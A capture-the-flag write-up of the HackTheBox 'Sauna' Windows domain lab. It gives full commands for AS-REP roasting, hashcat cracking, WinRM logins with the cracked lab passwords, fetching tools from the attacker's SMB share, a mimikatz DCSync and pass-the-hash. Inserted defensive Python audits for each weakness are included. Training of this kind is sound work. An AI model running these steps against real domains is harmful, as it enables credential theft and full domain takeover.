Box 10: HTB - Sauna

Today we are going to solve another boot2root challenge called "Sauna". It’s available at HackTheBox for penetration testing. This is an easy level lab.

Victor Le
Jul 2, 2022

I’ve been on the journey to pursue CRTP certification. Therefore, Windows and Active Directory pentesting is my interest at the present moment.

IP Address: 10.10.10.175

Enumeration:

As usual, start with nmap for port/service enumeration:

nmap -A -sV -sC -p- -T4 -Pn 10.10.10.175 -vvv

→ Result from Nmap scanning:

PORT      STATE SERVICE       REASON          VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-04-05 01:19:48Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49673/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49677/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49690/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49697/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC

Port 53 — DNS service:

→ Nothing to show

Port 80 — HTTP: Microsoft IIS Web Service

→ From the “Contact Us” page (http://10.10.10.175/about.html) on the website, you can collect a list of some users. If you find the complete names of company workers, you could try different AD username conventions. The most common conventions are: NameSurname, Name.Surname, NamSur (3 letters of each), Nam.Sur, NSurname, N.Surname, SurnameName, Surname.Name, SurnameN, Surname.N, 3 random letters and 3 random numbers (abc123).

Using the above list of names, we can customize our AD enumeration to explore more.

Then, keep enumerating the website's sub-domains with gobuster:

gobuster dns -d 'egotistical-bank.local' -t 25 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt

→ No interesting result

Port 88, 464 — TCP/UDP, used for Kerberos authentication

We can enumerate non-preauth users first:

python3 ./GetNPUsers.py -dc-ip 10.10.10.175 egotistical-bank.local/

→ There’s no result. Skip

Port 135, 139 TCP — These are used for RPC → WMI service and NetBIOS services. Therefore, they can be abused with impacket/wmiexec for remote access.

Port 389, 636 — Active Directory, LDAP Query

Use Nmap command with NSE Scripts for AD:

nmap -n -sV --script "ldap* and not brute" -p 389 10.10.10.175

Result: Context: DC=EGOTISTICAL-BANK,DC=LOCAL

Port 3268, 3269 — These ports are used for queries specifically targeted at the Global Catalog

Port 5985 — A WinRM listener can listen in two different ways: HTTP or HTTPS. By default, the WinRM port for HTTP is 5985, while the WinRM port for HTTPS is 5986.

Port 9389 — Active Directory Web Services

Foothold

Reuse Impacket/GetNPUsers to check for non-preauth users. However, this time, we first build a username list with another tool — username-anarchy

username-anarchy — Tools for generating usernames when penetration testing.

You can find more details here: https://pentesttools.net/username-anarchy-username-tools-for-penetration-testing/

Syntax:

./username-anarchy --input-file <fullnames.txt> --select-format first,flast,first.last,firstl > unames.txt

-i, --input-file FILE : Input list of names. Can be SPACE, CSV or TAB delimited

-l, --list-formats : List format plugins

-f, --select-format LIST : Select format plugins by name. Comma delimited list

If this is the first time you’ve heard about this attack method, here is a short explanation. AS-REP Roasting is similar to Kerberoasting in the sense that we query accounts for TGTs, get the hash, then crack it. However, in the case of AS-REP Roasting there’s a very big caveat: Kerberos pre-authentication must be disabled, which is not a default setting.

When you request a TGT via a Kerberos AS-REQ message, you also supply a timestamp that is encrypted with a key derived from your password. The Key Distribution Center (KDC) then decrypts the timestamp, verifies the request is coming from that user, then continues with the authentication process. This is the pre-authentication process for Kerberos, which is obviously a problem for an attacker, because without the user's password we cannot produce a timestamp that the KDC will accept. Of course, this is by design, to prevent attacks. However, if pre-authentication is turned off for a user, we can send an AS-REQ for that user and the KDC returns an AS-REP containing data encrypted with a key derived from that user's password, which can then be cracked offline. Since pre-auth is enabled by default, it has to be manually turned off, so this is rare, but still worth mentioning.

Note: Research into AS-REQ Pre-auth Attack:

After generating the username list successfully, return to GetNPUsers script:

python3 ./GetNPUsers.py -dc-ip 10.10.10.175 -usersfile user_list.txt -no-pass -format hashcat > /home/thanhlc/HTB/Sauna/password_hash

-dc-ip ip address: IP Address of the domain controller. If ommited, it use the domain part (FQDN) specified in the target parameter

-usersfile USERSFILE : File with user per line to test

-no-pass: don't ask for password (useful for -k)

-format {hashcat,john} : format to save the AS_REQ of users without pre-authentication. Default is hashcat

→ The user fsmith has the 'Do not require Kerberos preauthentication' option set
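From the defender's side, the same weakness can be audited and monitored. The following is an added example (not part of the original write-up): it flags enabled accounts with the "no pre-auth" flag in `userAccountControl` and picks out Security event 4768 records where a TGT was issued without pre-authentication. All account names other than fsmith, the addresses and the event records are constructed sample data.

```python
from collections import defaultdict

UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000  # "Do not require Kerberos preauthentication"

# Constructed sample: (sAMAccountName, userAccountControl) pairs from an LDAP export.
SAMPLE_ACCOUNTS = [
    ("fsmith", 0x410200),   # normal account, password never expires, no pre-auth
    ("jdoe", 0x000200),     # normal account, pre-auth required (the default)
    ("old_svc", 0x400202),  # no pre-auth, but the account is disabled
]

# Constructed sample: EventData fields of Security event 4768 (TGT requested) on a DC.
SAMPLE_4768 = [
    {"TargetUserName": "fsmith", "IpAddress": "::ffff:10.10.14.6",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TargetUserName": "jdoe", "IpAddress": "::ffff:10.10.10.50",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"TargetUserName": "nosuchuser", "IpAddress": "::ffff:10.10.14.6",
     "PreAuthType": "-", "TicketEncryptionType": "0xffffffff", "Status": "0x6"},
]


def roastable_accounts(accounts):
    """Enabled accounts whose UAC flags let anyone request an AS-REP for them."""
    return [name for name, uac in accounts
            if uac & UF_DONT_REQUIRE_PREAUTH and not uac & UF_ACCOUNTDISABLE]


def as_rep_without_preauth(events):
    """Successful 4768 events issued with PreAuthType 0, grouped by client address."""
    by_source = defaultdict(list)
    for ev in events:
        # Failed requests carry no usable PreAuthType, so check Status first.
        if ev["Status"] != "0x0" or int(ev["PreAuthType"]) != 0:
            continue
        rc4 = int(ev["TicketEncryptionType"], 16) == 0x17  # RC4-HMAC (etype 23)
        source = ev["IpAddress"].replace("::ffff:", "")
        by_source[source].append((ev["TargetUserName"], "rc4" if rc4 else "other"))
    return dict(by_source)


if __name__ == "__main__":
    print(roastable_accounts(SAMPLE_ACCOUNTS))
    print(as_rep_without_preauth(SAMPLE_4768))
```

Re-enabling pre-authentication on every account the first function returns removes the exposure; the second function is a starting point for an alert on the domain controller's Security log.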

Crack the password from this AS-REP hash with hashcat:

hashcat -m 18200 /home/thanhlc/HTB/Sauna/hash_fsmith /usr/share/wordlists/rockyou.txt --show

→ Extracted password: Thestrokes23

Use evil-winrm to access this machine remotely:

./evil-winrm.rb -i 10.10.10.175 -u fsmith -p Thestrokes23

View the content of flag user.txt with type command:

Privilege Escalation

Move to the next phase — The most attractive phase

BloodHound with fsmith user:

Copy the SharpHound.exe tool to a shared folder, then start an SMB server to host it:

impacket-smbserver thanhsmb $(pwd) -smb2support -user thanhlc -password Admin@123

From the evil-winrm session on the target machine, use the following PowerShell commands to download the SharpHound tool from the file share (tip from ippsec):

$pass = convertto-securestring 'Admin@123' -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential('thanhlc', $pass)

New-PSDrive -Name thanhsmb -PSProvider FileSystem -Credential $cred -Root \\10.10.14.6\thanhsmb

Trick: You can upload the executable script to target machine with command upload <full_path_to_script> in the evil-winrm session.

Actually, after collecting AD information with the current user (fsmith), there’s nothing to show in Bloodhound in order to help us elevate the privilege from the owned user — fsmith. Consequently, you should ignore it and try another method.

How to use WinPEAS?

You can use WinPEAS to explore juicy things: https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS

WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz

Check also the Local Windows Privilege Escalation checklist from book.hacktricks.xyz

Next, through evil-winrm session, we can upload WinPEAS tool to the target machine:

upload /home/thanhlc/HTB/Sauna/smb/winPEASx64.exe

Now, run WinPEAS to investigate this box more deeply:

.\winPEASx64.exe

Yayyy, using WinPEAS, I found something important to loot:

Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!

Note: How to Configure and Turn on automatic logon in Windows: https://docs.microsoft.com/en-us/troubleshoot/windows-server/user-profiles-and-logon/turn-on-automatic-logon

This feature applies to: Windows Server 2019, Windows Server 2016, Windows Server 2012 R2. By using this feature, other users can start your computer and use the account that you establish to automatically log on.

Important Notes: The autologon feature is provided as a convenience. However, this feature may be a security risk. If you set a computer for autologon, anyone who can physically obtain access to the computer can gain access to all the computer’s contents, including any networks it is connected to. Additionally, when autologon is turned on, the password is stored in the registry in plain text. The specific registry key that stores this value can be remotely read by the Authenticated Users group. This setting is recommended only for cases in which the computer is physically secured and steps have been taken to make sure that untrusted users cannot remotely access the registry.
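The finding above is easy to check for during a hardening review. The following is an added example (not part of the original write-up) that parses the text output of `reg query` for the Winlogon key and reports a stored plaintext autologon password without echoing it. The sample output is constructed and its password value is a placeholder.

```python
import re

WINLOGON_KEY = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# Constructed sample of `reg query "<WINLOGON_KEY>"` output; the password is a placeholder.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoAdminLogon    REG_SZ    1
    DefaultDomainName    REG_SZ    EGOTISTICALBANK
    DefaultUserName    REG_SZ    EGOTISTICALBANK\svc_loanmanager
    DefaultPassword    REG_SZ    <constructed-placeholder>
    Shell    REG_SZ    explorer.exe
"""

# Value lines are indented: name, type, data. The key path line is not indented.
VALUE_LINE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s*(.*)$")


def parse_reg_query(text):
    """Return {value name: data} for every value line in `reg query` output."""
    values = {}
    for line in text.splitlines():
        match = VALUE_LINE.match(line)
        if match:
            values[match.group(1)] = match.group(3).strip()
    return values


def autologon_findings(text):
    """List autologon weaknesses; the password itself is never included."""
    values = parse_reg_query(text)
    findings = []
    password = values.get("DefaultPassword", "")
    if password:
        user = values.get("DefaultUserName", "unknown user")
        findings.append(f"plaintext DefaultPassword stored for {user} "
                        f"({len(password)} characters, value withheld)")
    if values.get("AutoAdminLogon") == "1":
        findings.append("AutoAdminLogon is enabled")
    return findings


if __name__ == "__main__":
    for finding in autologon_findings(SAMPLE_REG_OUTPUT):
        print(finding)
```

A host without autologon configured returns an empty list. Any password found this way should be rotated, since it has been readable in the registry.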

With the credentials of the new account (shown by WinPEAS as svc_loanmanager; the logon name used below is svc_loanmgr), we can try logging in to this machine once again with evil-winrm, then check some information related to this user.

./evil-winrm.rb -i 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'

Instead of SharpHound on Windows, we can use bloodhound-python, available on the Kali distro, to enumerate the domain:

bloodhound-python -d egotistical-bank.local -u svc_loanmgr -p 'Moneymakestheworldgoround!' -gc sauna.egotistical-bank.local -c all -ns 10.10.10.175

After getting the .JSON enumeration files → upload all of them to BloodHound

In Bloodhound GUI, query and select the user svc_loanmgr@egotistical-bank.local and mark it as Owned


Next, in the “Analysis” tab, select “Find Principals with DCSync Rights”

You will see that this user has both GetChanges and GetChangesAll rights on this domain. Therefore, this account can be abused to launch a DCSync Attack using mimikatz tool.

Mimikatz can be super finicky. Ideally, you can run it (Enter) and drop to a Mimikatz prompting shell, but for some reason on this box (Sauna), it just started spitting the prompt at me repeatedly and I had to kill my session many times. Till now, I have no idea about it. It’s always safer to just run mimikatz.exe with the commands you want to run following it from the command line:

.\mimikatz 'lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:Administrator' exit

This spits out a ton of information. The hash I need (that matches the secretsdump output) is the Hash NTLM in the middle above. I could also use /all instead of /user:administrator to dump the entire cache of all users, but user administrator is all we need here.

Mimikatz output
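The BloodHound finding and the DCSync step above both have a defensive counterpart. The following is an added example (not part of the original write-up): it audits which principals hold both replication rights on the domain root, and flags Security event 4662 records where a non-machine account exercised the Get-Changes-All right. The ACE list, the event records, the `SAUNA$`, `helpdesk` and `jdoe` names and the expected-principals list are constructed assumptions.

```python
from collections import defaultdict

GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"      # DS-Replication-Get-Changes
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"  # DS-Replication-Get-Changes-All
# Assumption: principals expected to replicate in this domain; adjust per environment.
EXPECTED = {"Domain Controllers", "Enterprise Domain Controllers", "Administrators"}

# Constructed sample: allow ACEs on the domain root as (principal, extended-right GUID).
SAMPLE_ACES = [
    ("Domain Controllers", GET_CHANGES), ("Domain Controllers", GET_CHANGES_ALL),
    ("Administrators", GET_CHANGES), ("Administrators", GET_CHANGES_ALL),
    ("svc_loanmgr", GET_CHANGES), ("svc_loanmgr", GET_CHANGES_ALL.upper()),
    ("helpdesk", GET_CHANGES),  # one right alone is not enough for DCSync
]

# Constructed sample: EventData of Security event 4662 (operation on a directory object).
SAMPLE_4662 = [
    {"SubjectUserName": "SAUNA$", "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "svc_loanmgr", "AccessMask": "0x100",
     "Properties": "%%7688 {1131F6AD-9C07-11D1-F79F-00C04FC2DCD2}"},
    {"SubjectUserName": "jdoe", "AccessMask": "0x10",
     "Properties": "%%7684 {bf967aba-0de6-11d0-a285-00aa003049e2}"},
]


def dcsync_capable(aces, expected=EXPECTED):
    """Principals holding both replication rights that are not on the expected list."""
    rights = defaultdict(set)
    for principal, guid in aces:
        rights[principal].add(guid.lower())
    return sorted(p for p, held in rights.items()
                  if {GET_CHANGES, GET_CHANGES_ALL} <= held and p not in expected)


def dcsync_requests(events):
    """4662 control-access events for Get-Changes-All made by a non-machine account."""
    return [ev["SubjectUserName"] for ev in events
            if int(ev["AccessMask"], 16) & 0x100            # Control Access
            and GET_CHANGES_ALL in ev["Properties"].lower()
            and not ev["SubjectUserName"].endswith("$")]    # DCs replicate as machine accounts


if __name__ == "__main__":
    print(dcsync_capable(SAMPLE_ACES))
    print(dcsync_requests(SAMPLE_4662))
```

Removing the two rights from any principal the audit returns closes the path shown here; the event check depends on directory service access auditing being enabled on the domain controllers.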

With the NTLM hash we got from above, use evil-winrm and a Pass-The-Hash attack to log in with an administrator session:

evil-winrm.rb -i 10.10.10.175 -u administrator -H <ntlm_hash>

Successful login → Let’s check the security context with whoami command.

At this point, we have all privileges on this sole machine. Capturing the flag is an easy-peasy task 😄

Lesson Learned:

  • AS-REP Roasting Attack
  • Learn to handle some AD Enumeration tools, such as: BloodHound, bloodhound-python...
  • From the Contact list on the website, we can generate a list of candidate usernames when penetration testing, using the username-anarchy tool
  • Enumerate the available PrivEsc paths on Windows with WinPEAS
  • How to use Mimikatz to run a DCSync attack and some tips to fix errors when using it.
  • Pass-the-hash Attack with tool crackmapexec, psexec.py, wmiexec.py or even evil-winrm

Finally, I end the 10th box here on my journey to study OSCP. All comments and suggestions from you will help me make much progress. It's gonna be a long road ahead 💪

THANKS FOR READING AND SUPPORTING!!
